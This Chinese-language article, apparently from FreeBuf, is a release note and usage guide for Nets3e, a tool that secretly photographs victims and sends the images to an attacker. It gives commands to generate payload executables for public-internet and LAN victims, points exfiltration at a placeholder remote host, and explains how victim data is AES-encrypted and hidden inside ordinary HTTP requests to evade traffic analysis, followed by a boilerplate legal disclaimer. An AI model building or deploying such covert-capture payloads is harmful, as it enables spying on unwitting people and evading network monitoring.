Nets3e v1.1.2(偷拍照片,防止中间人嗅探流量分析)

Github==>https://github.com/MartinxMax/Nets3e
首页
历史更新:Nets3e v1.1.2
废弃Base64编码传输,新增AES加密选项,将数据包混淆在正常的http请求中,并且进行加密传输,增大被中间人截获数据破解的难度Nets3e v1.1.1
在Nets3e v1.0.0
基础上将代码进行了优化瘦身,并且提高稳定性,新增 debug内网最短路径攻击功能(通常用来测试主要功能是否存在异常)
基础使用
#python3 Nets3e.py -h
公网攻击示例
生成Payload
#python3 Nets3e.py -rh http://xxxx.com:11111 -g
公网受害者点击Nets3eClient_release.exe
公网杀链
局域网攻击示例
生成Payload
#python3 Nets3e.py -g
公网受害者点击Nets3eClient_debug.exe
局域网杀链
Payload注意事项
生成前
-lp
:设置本机监听端口(默认10032)-lh
:设置本机监听IP(默认当前网卡IP)-rh
:进行流量转发的远程主机,协议是TCP不过这里要改成HTTP进行生成-g
:生成PAYLOAD,如果你已经生成了payload将无需使用该参数-salt xxx
:将受害者的数据传输前进行AES加密防止中间人嗅探
生成后
Nets3eClient_debug.exe
->局域网攻击的调试版本主要用于测试内部网络受害者数据是否能够到达本地机器
Nets3eClient_release.exe
->公网攻击的发布版本主要用于攻击公网用户
为什么传输中要将受害者数据进行加密?
增大破解难度
Nets3e v1.1.1 以前
受害者将数据直接base64编码传输,导致数据极其容易被嗅探分析,攻击者攻击行为将异常明显
Nets3e v1.1.2 最新
废弃base64编码后传输,采用AES对称加密,受害者将数据进行带盐加密后再传输数据给攻击者
为什么要使用http传输?
采用TCP太过于明显,这里将发送给攻击者的流量包伪装混淆至正常的http请求中
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
文章目录